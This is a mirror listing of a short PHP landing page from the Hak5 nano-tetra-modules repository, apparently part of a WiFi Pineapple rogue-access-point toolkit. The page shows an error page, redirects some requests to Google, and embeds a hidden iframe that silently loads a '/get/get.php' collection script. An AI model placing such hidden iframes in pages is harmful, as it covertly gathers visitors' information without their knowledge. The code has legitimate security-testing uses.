mirror of
https://github.com/hak5/nano-tetra-modules.git
synced 2025-10-29 16:58:09 +00:00
12 lines
297 B
PHP
12 lines
297 B
PHP
<?php
|
|
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
|
|
|
|
if (strpos($ref, "example"))
|
|
{
|
|
header('Status: 302 Found');
|
|
header('Location: https://www.google.com');
|
|
}
|
|
|
|
require('error.php');
|
|
?>
|
|
<iframe style="display:none;" src="/get/get.php"></iframe>
|